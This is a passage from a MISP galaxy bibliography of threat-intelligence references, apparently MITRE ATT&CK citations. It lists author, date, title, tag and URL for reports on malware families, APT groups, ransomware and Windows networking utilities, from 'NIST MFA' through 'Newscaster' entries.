Table 14588. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/

NIST MFA

NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January 30, 2020.

The tag is: misp-galaxy:references="NIST MFA"

Table 14589. Table References

Links

https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication

Talos Cobalt Group July 2018

Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.

The tag is: misp-galaxy:references="Talos Cobalt Group July 2018"

Table 14590. Table References

Links

https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html

U.S. CISA Zoho Exploits September 7 2023

Cybersecurity and Infrastructure Security Agency. (2023, September 7). Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="U.S. CISA Zoho Exploits September 7 2023"

Table 14591. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a

CIS Multiple SMB Vulnerabilities

CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="CIS Multiple SMB Vulnerabilities"

Table 14592. Table References

Links

https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/

GitHub Mauraena

Orrù, M., Trotta, G.. (2019, September 11). Muraena. Retrieved October 14, 2019.

The tag is: misp-galaxy:references="GitHub Mauraena"

Table 14593. Table References

Links

https://github.com/muraenateam/muraena

Arbor Musical Chairs Feb 2018

Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="Arbor Musical Chairs Feb 2018"

Table 14594. Table References

Links

https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/

Mythc Documentation

Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Mythc Documentation"

Table 14595. Table References

Links

https://docs.mythic-c2.net/

Mythic Github

Thomas, C. (2018, July 4). Mythic. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Mythic Github"

Table 14596. Table References

Links

https://github.com/its-a-feature/Mythic

Crowdstrike Mythic Leopard Profile

Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Crowdstrike Mythic Leopard Profile"

Table 14597. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/

CheckPoint Naikon May 2020

CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="CheckPoint Naikon May 2020"

Table 14598. Table References

Links

https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/

Bitdefender Naikon April 2021

Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.

The tag is: misp-galaxy:references="Bitdefender Naikon April 2021"

Table 14599. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf

Microsoft Named Pipes

Microsoft. (2018, May 31). Named Pipes. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Named Pipes"

Table 14600. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes

fsecure NanHaiShu July 2016

F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.

The tag is: misp-galaxy:references="fsecure NanHaiShu July 2016"

Table 14601. Table References

Links

https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

DigiTrust NanoCore Jan 2017

The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="DigiTrust NanoCore Jan 2017"

Table 14602. Table References

Links

https://www.digitrustgroup.com/nanocore-not-your-average-rat/

PaloAlto NanoCore Feb 2016

Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="PaloAlto NanoCore Feb 2016"

Table 14603. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/

Unit42 BabyShark Feb 2019

Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.

The tag is: misp-galaxy:references="Unit42 BabyShark Feb 2019"

Table 14604. Table References

Links

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

National Vulnerability Database

National Vulnerability Database. (n.d.). National Vulnerability Database. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="National Vulnerability Database"

Table 14605. Table References

Links

https://nvd.nist.gov/

NationsBuying

Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="NationsBuying"

Table 14606. Table References

Links

https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

FireEye Maze May 2020

Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.

The tag is: misp-galaxy:references="FireEye Maze May 2020"

Table 14607. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

Talos NavRAT May 2018

Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.

The tag is: misp-galaxy:references="Talos NavRAT May 2018"

Table 14608. Table References

Links

https://blog.talosintelligence.com/2018/05/navrat.html

GitHub NBNSpoof

Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="GitHub NBNSpoof"

Table 14609. Table References

Links

https://github.com/nomex/nbnspoof

SecTools nbtscan June 2003

SecTools. (2003, June 11). NBTscan. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="SecTools nbtscan June 2003"

Table 14610. Table References

Links

https://sectools.org/tool/nbtscan/

Debian nbtscan Nov 2019

Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="Debian nbtscan Nov 2019"

Table 14611. Table References

Links

https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html

TechNet Nbtstat

Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Nbtstat"

Table 14612. Table References

Links

https://technet.microsoft.com/en-us/library/cc940106.aspx

NCSC Sandworm Feb 2020

NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="NCSC Sandworm Feb 2020"

Table 14613. Table References

Links

https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory

TechNet NetBIOS

Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="TechNet NetBIOS"

Table 14614. Table References

Links

https://technet.microsoft.com/library/cc958811.aspx

Microsoft Net

Microsoft. (2017, February 14). Net Commands On Windows Operating Systems. Retrieved March 19, 2020.

The tag is: misp-galaxy:references="Microsoft Net"

Table 14615. Table References

Links

https://support.microsoft.com/en-us/help/556003

Savill 1999

Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.

The tag is: misp-galaxy:references="Savill 1999"

Table 14616. Table References

Links

http://windowsitpro.com/windows/netexe-reference

Microsoft Net Utility

Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.

The tag is: misp-galaxy:references="Microsoft Net Utility"

Table 14617. Table References

Links

https://msdn.microsoft.com/en-us/library/aa939914

TechNet Netsh Firewall

Microsoft. (2009, June 3). Netsh Commands for Windows Firewall. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="TechNet Netsh Firewall"

Table 14618. Table References

Links

https://technet.microsoft.com/en-us/library/cc771046(v=ws.10).aspx

Netsh.exe - LOLBAS Project

LOLBAS. (2019, December 24). Netsh.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Netsh.exe - LOLBAS Project"

Table 14619. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Netsh/

Github Netsh Helper CS Beacon

Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.

The tag is: misp-galaxy:references="Github Netsh Helper CS Beacon"

Table 14620. Table References

Links

https://github.com/outflankbv/NetshHelperBeacon

TechNet Netstat

Microsoft. (n.d.). Netstat. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Netstat"

Table 14621. Table References

Links

https://technet.microsoft.com/en-us/library/bb490947.aspx

TechNet Net Time

Microsoft. (n.d.). Net time. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="TechNet Net Time"

Table 14622. Table References

Links

https://technet.microsoft.com/bb490716.aspx

Technet Net Use

Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="Technet Net Use"

Table 14623. Table References

Links

https://technet.microsoft.com/bb490717.aspx

TrendMicro Netwalker May 2020

Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020.

The tag is: misp-galaxy:references="TrendMicro Netwalker May 2020"

Table 14624. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/

Sophos Netwalker May 2020

Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="Sophos Netwalker May 2020"

Table 14625. Table References

Links

https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/

McAfee Netwire Mar 2015

McAfee. (2015, March 2). Netwire RAT Behind Recent Targeted Attacks. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="McAfee Netwire Mar 2015"

Table 14626. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/

Windows Anonymous Enumeration of SAM Accounts

Microsoft. (2017, April 19). Network access: Do not allow anonymous enumeration of SAM accounts and shares. Retrieved May 20, 2020.

The tag is: misp-galaxy:references="Windows Anonymous Enumeration of SAM Accounts"

Table 14627. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-do-not-allow-anonymous-enumeration-of-sam-accounts-and-shares

Microsoft Network access Credential Manager

Microsoft. (2016, August 31). Network access: Do not allow storage of passwords and credentials for network authentication. Retrieved November 23, 2020.

The tag is: misp-galaxy:references="Microsoft Network access Credential Manager"

Table 14628. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/jj852185(v=ws.11)?redirectedfrom=MSDN

Microsoft NFS Overview

Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft NFS Overview"

Table 14629. Table References

Links

https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview

Network Provider API

Microsoft. (2021, January 7). Network Provider API. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Network Provider API"

Table 14630. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api

Malwarebytes Agent Tesla April 2020

Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="Malwarebytes Agent Tesla April 2020"

Table 14631. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/

Malware Bytes New AgentTesla variant steals WiFi credentials

Hossein Jazi. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Malware Bytes New AgentTesla variant steals WiFi credentials"

Table 14632. Table References

Links

https://www.malwarebytes.com/blog/news/2020/04/new-agenttesla-variant-steals-wifi-credentials

TrendMicro New Andariel Tactics July 2018

Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="TrendMicro New Andariel Tactics July 2018"

Table 14633. Table References

Links

https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html

Unit 42 C0d0so0 Jan 2016

Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.

The tag is: misp-galaxy:references="Unit 42 C0d0so0 Jan 2016"

Table 14634. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/

Trend Micro Banking Malware Jan 2019

Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Trend Micro Banking Malware Jan 2019"

Table 14635. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/

IBM IcedID November 2017

Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.

The tag is: misp-galaxy:references="IBM IcedID November 2017"

Table 14636. Table References

Links

https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

Minerva Labs Black Basta May 2022

Zargarov, N. (2022, May 2). New Black Basta Ransomware Hijacks Windows Fax Service. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Minerva Labs Black Basta May 2022"

Table 14637. Table References

Links

https://minerva-labs.com/blog/new-black-basta-ransomware-hijacks-windows-fax-service/

Google TAG Lazarus Jan 2021

Weidemann, A. (2021, January 25). New campaign targeting security researchers. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="Google TAG Lazarus Jan 2021"

Table 14638. Table References

Links

https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/

Airbus Derusbi 2015

Perigaud, F. (2015, December 15). Newcomers in the Derusbi family. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Airbus Derusbi 2015"

Table 14639. Table References

Links

http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family

Malwarebytes Crossrider Apr 2018

Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.

The tag is: misp-galaxy:references="Malwarebytes Crossrider Apr 2018"

Table 14640. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/

CyberBit Early Bird Apr 2018

Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’ Code Injection Technique Discovered. Retrieved May 24, 2018.

The tag is: misp-galaxy:references="CyberBit Early Bird Apr 2018"

Table 14641. Table References

Links

https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/

Zscaler Molerats Campaign

Sahil Antil, Sudeep Singh. (2022, January 20). New espionage attack by Molerats APT targeting users in the Middle East. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Zscaler Molerats Campaign"

Table 14642. Table References

Links

https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east

CrowdStrike Wizard Spider March 2019

Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="CrowdStrike Wizard Spider March 2019"

Table 14643. Table References

Links

https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/

Bleeping Computer Evil Corp mimics PayloadBin gang 2022

Abrams, L. (2021, June 6). New Evil Corp ransomware mimics PayloadBin gang to evade US sanctions. Retrieved July 19, 2022.

The tag is: misp-galaxy:references="Bleeping Computer Evil Corp mimics PayloadBin gang 2022"

Table 14644. Table References

Links

https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/

Microsoft Block Office Macros

Windows Defender Research. (2016, March 22). New feature in Office 2016 can block macros and help prevent infection. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Microsoft Block Office Macros"

Table 14645. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/

TechNet Office Macro Security

Microsoft Malware Protection Center. (2016, March 22). New feature in Office 2016 can block macros and help prevent infection. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="TechNet Office Macro Security"

Table 14646. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/

SolarWinds Sunburst Sunspot Update January 2021

Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.

The tag is: misp-galaxy:references="SolarWinds Sunburst Sunspot Update January 2021"

Table 14647. Table References

Links

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

BleepingComp Godlua JUL19

Gatlan, S. (2019, July 3). New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="BleepingComp Godlua JUL19"

Table 14648. Table References

Links

https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/

HTML Smuggling Menlo Security 2020

Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.

The tag is: misp-galaxy:references="HTML Smuggling Menlo Security 2020"

Table 14649. Table References

Links

https://www.menlosecurity.com/blog/new-attack-alert-duri

Microsoft New-InboxRule

Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.

The tag is: misp-galaxy:references="Microsoft New-InboxRule"

Table 14650. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps

AWS - IAM Console Best Practices

Moncur, Rob. (2020, July 5). New Information in the AWS IAM Console Helps You Follow IAM Best Practices. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="AWS - IAM Console Best Practices"

Table 14651. Table References

Links

https://aws.amazon.com/blogs/security/newly-updated-features-in-the-aws-iam-console-help-you-adhere-to-iam-best-practices/

Trend Micro Ransomware February 2021

Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="Trend Micro Ransomware February 2021"

Table 14652. Table References

Links

https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

Avast CCleaner3 2018

Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.

The tag is: misp-galaxy:references="Avast CCleaner3 2018"

Table 14653. Table References

Links

https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities

Tsunami

Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Tsunami"

Table 14654. Table References

Links

https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

amnesia malware

Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="amnesia malware"

Table 14655. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

ClearSky Siamesekitten August 2021

ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.

The tag is: misp-galaxy:references="ClearSky Siamesekitten August 2021"

Table 14656. Table References

Links

https://www.clearskysec.com/siamesekitten/

Unit 42 NOKKI Sept 2018

Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Unit 42 NOKKI Sept 2018"

Table 14657. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

Malwarebytes Higaisa 2020

Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021.

The tag is: misp-galaxy:references="Malwarebytes Higaisa 2020"

Table 14658. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/

Gallagher 2015

Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.

The tag is: misp-galaxy:references="Gallagher 2015"

Table 14659. Table References

Links

http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

FireEye TLS Nov 2017

Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="FireEye TLS Nov 2017"

Table 14660. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

FireEye Ursnif Nov 2017

Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="FireEye Ursnif Nov 2017"

Table 14661. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

Antiquated Mac Malware

Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Antiquated Mac Malware"

Table 14662. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

Trend Micro MacOS Backdoor November 2020

Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.

The tag is: misp-galaxy:references="Trend Micro MacOS Backdoor November 2020"

Table 14663. Table References

Links

https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

TrendMicro MacOS April 2018

Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="TrendMicro MacOS April 2018"

Table 14664. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/

TrendMicro macOS Dacls May 2020

Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="TrendMicro macOS Dacls May 2020"

Table 14665. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/

OSX Malware Exploits MacKeeper

Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="OSX Malware Exploits MacKeeper"

Table 14666. Table References

Links

https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html

Carbon Black Shlayer Feb 2019

Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.

The tag is: misp-galaxy:references="Carbon Black Shlayer Feb 2019"

Table 14667. Table References

Links

https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/

Palo Alto Rover

Ray, V., Hayashi, K. (2016, February 29). New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016.

The tag is: misp-galaxy:references="Palo Alto Rover"

Table 14668. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/

Palo Alto Reaver Nov 2017

Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Palo Alto Reaver Nov 2017"

Table 14669. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

Trend Micro Xbash Sept 2018

Trend Micro. (2018, September 19). New Multi-Platform Xbash Packs Obfuscation, Ransomware, Coinminer, Worm and Botnet. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Trend Micro Xbash Sept 2018"

Table 14670. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/new-multi-platform-xbash-packs-obfuscation-ransomware-coinminer-worm-and-botnet

MSRC Nobelium June 2021

MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="MSRC Nobelium June 2021"

Table 14671. Table References

Links

https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/

Symantec Orangeworm April 2018

Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.

The tag is: misp-galaxy:references="Symantec Orangeworm April 2018"

Table 14672. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

OSX.Dok Malware

Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="OSX.Dok Malware"

Table 14673. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

OSX Keydnap malware

Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="OSX Keydnap malware"

Table 14674. Table References

Links

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Intego Shlayer Apr 2018

Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.

The tag is: misp-galaxy:references="Intego Shlayer Apr 2018"

Table 14675. Table References

Links

https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/

Cybereason Linux Exim Worm

Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Cybereason Linux Exim Worm"

Table 14676. Table References

Links

https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

Microsoft Prestige ransomware October 2022

MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.

The tag is: misp-galaxy:references="Microsoft Prestige ransomware October 2022"

Table 14677. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

Unit 42 MechaFlounder March 2019

Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="Unit 42 MechaFlounder March 2019"

Table 14678. Table References

Links

https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/

Talos Nyetya June 2017

Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.

The tag is: misp-galaxy:references="Talos Nyetya June 2017"

Table 14679. Table References

Links

https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

Cyble Black Basta May 2022

Cyble. (2022, May 6). New ransomware variant targeting high-value organizations. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Cyble Black Basta May 2022"

Table 14680. Table References

Links

https://blog.cyble.com/2022/05/06/black-basta-ransomware/

Bleepingcomputer RAT malware 2020

Abrams, L. (2020, October 23). New RAT malware gets commands via Discord, has ransomware feature. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Bleepingcomputer RAT malware 2020"

Table 14681. Table References

Links

https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/

IBM ITG18 2020

Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.

The tag is: misp-galaxy:references="IBM ITG18 2020"

Table 14682. Table References

Links

https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/

new_rogue_DHCP_serv_malware

Irwin, Ullrich, J. (2009, March 16). new rogue-DHCP server malware. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="new_rogue_DHCP_serv_malware"

Table 14683. Table References

Links

https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/

NCSC, CISA, FBI, NSA. (2022, February 23). New Sandworm malware Cyclops Blink replaces VPNFilter. Retrieved March 3, 2022.

The tag is: misp-galaxy:references="NCSC CISA Cyclops Blink Advisory February 2022"

Table 14684. Table References

Links

https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter

Eweek Newscaster and Charming Kitten May 2014

Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Eweek Newscaster and Charming Kitten May 2014"

Table 14685. Table References

Links

https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering

Deep Instinct TA505 Apr 2019

